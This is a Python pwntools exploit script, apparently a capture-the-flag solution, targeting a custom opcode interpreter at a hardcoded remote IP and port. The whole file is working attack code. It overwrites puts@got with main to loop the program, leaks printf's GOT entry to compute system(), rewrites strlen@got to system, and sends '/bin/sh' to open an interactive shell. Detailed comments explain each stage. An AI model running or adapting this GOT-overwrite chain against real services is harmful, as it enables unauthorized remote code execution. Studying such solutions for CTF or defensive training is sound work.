- from pwn import *
- import sys
def decrease_address():
    """Return the ':<' opcode: one step of the interpreter's pointer downward.

    Every stage below emits it ``data - fu`` (0x20) times to walk from
    ``data`` to ``fu``, so the script relies on one opcode moving the
    pointer by exactly one byte.
    """
    opcode = ":<"
    return opcode
def increase_address():
    """Return the ':>' opcode: one step of the interpreter's pointer upward.

    The stages interleave it with set/put operations to touch the four
    consecutive bytes of a GOT slot one at a time.
    """
    opcode = ":>"
    return opcode
def decrease_value():
    """Return the ':-' opcode (decrement the current cell).

    Provided for completeness; none of the stages in this script use it.
    """
    opcode = ":-"
    return opcode
def increase_value():
    """Return the ':+' opcode (increment the current cell).

    Provided for completeness; none of the stages in this script use it.
    """
    opcode = ":+"
    return opcode
def put_value():
    """Return the '::' opcode (output the current cell).

    Stage 2 issues it four times and then reads back exactly four bytes, so
    the script treats one put as one byte of output.
    """
    opcode = "::"
    return opcode
def set_value():
    """Return the ':.' opcode (store one byte of input into the current cell).

    Stages 1 and 3 issue it five times and then send exactly five bytes, so
    the script treats one set as consuming one byte from stdin.
    """
    opcode = ":."
    return opcode
def xor_value():
    """Return the ':_' opcode (xor the current cell).

    Provided for completeness; none of the stages in this script use it.
    """
    opcode = ":_"
    return opcode
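# Target endpoint. The defaults are the CTF service this script was written
# against; both may be overridden on the command line
# (``python exploit.py HOST PORT``) so the same script can be run against a
# local copy of the binary. ``sys`` was already imported but never used.
HOST = sys.argv[1] if len(sys.argv) > 1 else '69.90.132.40'
PORT = int(sys.argv[2]) if len(sys.argv) > 2 else 4001
r = remote(HOST, PORT)

# Binary-specific addresses. The 0x0804xxxx form and the use of p32/u32 below
# say 32-bit, non-PIE. ``data`` and ``fu`` are 0x20 apart; every stage walks
# the interpreter pointer from ``data`` back to ``fu`` with (data - fu)
# decrement opcodes, so one opcode is assumed to move the pointer one byte.
data = 0x0804A080   # where the interpreter pointer starts (as the stage payloads assume)
fu = 0x0804A060     # NOTE(review): what this label holds in the binary is not recoverable from the script
main = 0x080486DE   # written over puts@got in stage 1 so the program restarts main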
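# ---- stage 1: overwrite puts@got with main ---------------------------------
# Presumably the program calls puts() after running the submitted code; with
# puts@got pointing at main, each stage ends by re-entering main, which is
# what lets the script submit several programs over one connection (the
# "Enter your code:" prompt reappears after every stage).
r.recvuntil(b"Enter your code:")

# Walk the pointer from ``data`` back to ``fu`` (0x20 cells), then issue five
# "set" operations: one at ``fu`` and four more, each after a single pointer
# increment. Every set consumes one byte from stdin, so exactly five bytes
# follow the program: the low byte 0x1c, then the four bytes of ``main``.
# (How ``fu``/set redirect the write is the target interpreter's business and
# not visible here; the byte counts are what the payload commits to.)
payload = decrease_address() * (data - fu)
payload += set_value()
payload += set_value()
payload += increase_address() + set_value()
payload += increase_address() + set_value()
payload += increase_address() + set_value()
# Opcodes are ASCII; encode explicitly instead of relying on pwntools'
# str->bytes coercion under Python 3 (a no-op on Python 2).
r.sendline(payload.encode())

# 0x0804A01C is the puts GOT slot (the original note said "plt", but the
# address sits in the same .got.plt region as the slots used below).
r.send(b"\x1c")
r.send(p32(main))   # little-endian, matching the 32-bit target
r.recvuntil(b"Enter your code:")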
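# ---- stage 2: leak the printf GOT entry, derive system -----------------------
# Same walk as stage 1, then one set (consuming a single byte, the low byte
# 0x0c) followed by four "put" operations, each after a pointer increment, so
# the program emits four raw bytes which the script reads as printf's address.
payload = decrease_address() * (data - fu)
payload += set_value()
payload += put_value()
payload += increase_address() + put_value()
payload += increase_address() + put_value()
payload += increase_address() + put_value()
r.sendline(payload.encode())
r.send(b"\x0c")   # presumably 0x0804A00C: printf@got, low byte only

# Exactly four raw bytes come back. recvn() blocks until all four have been
# received, replacing the original one-byte-at-a-time polling loop with
# sleep(); it also keeps ``leak`` as bytes, which u32() needs on Python 3.
leak = r.recvn(4)
printf = u32(leak)
print(hex(printf))   # parenthesised: the original was Python 2-only syntax
r.recvuntil(b"Enter your code:")

# Distance printf - system in the *remote* libc. This is specific to one libc
# build: if the target libc changes, recompute it (e.g. from
# libc.symbols['printf'] - libc.symbols['system']), otherwise stage 3 writes
# a wrong address into strlen@got and the final call crashes instead of
# spawning a shell. Sanity check: the result should look like a libc address.
offset_system = 59104
system = printf - offset_system
print(hex(system))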
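# ---- stage 3: overwrite strlen@got with system ------------------------------
# Identical payload shape to stage 1: five set operations, five bytes sent —
# the low byte 0x20 of the slot, then the four bytes of ``system``.
payload = decrease_address() * (data - fu)
payload += set_value()
payload += set_value()
payload += increase_address() + set_value()
payload += increase_address() + set_value()
payload += increase_address() + set_value()
r.sendline(payload.encode())
r.send(b"\x20")   # 0x0804A020: strlen@got, low byte only
r.send(p32(system))
r.recvuntil(b"Enter your code:")

# ---- stage 4: the program's strlen(input) is now system(input) ----------------
# The explicit NUL terminates the string before the "\n" that sendline
# appends, so system() sees "/bin/sh" rather than "/bin/sh\n".
r.sendline(b"/bin/sh\x00")
r.interactive()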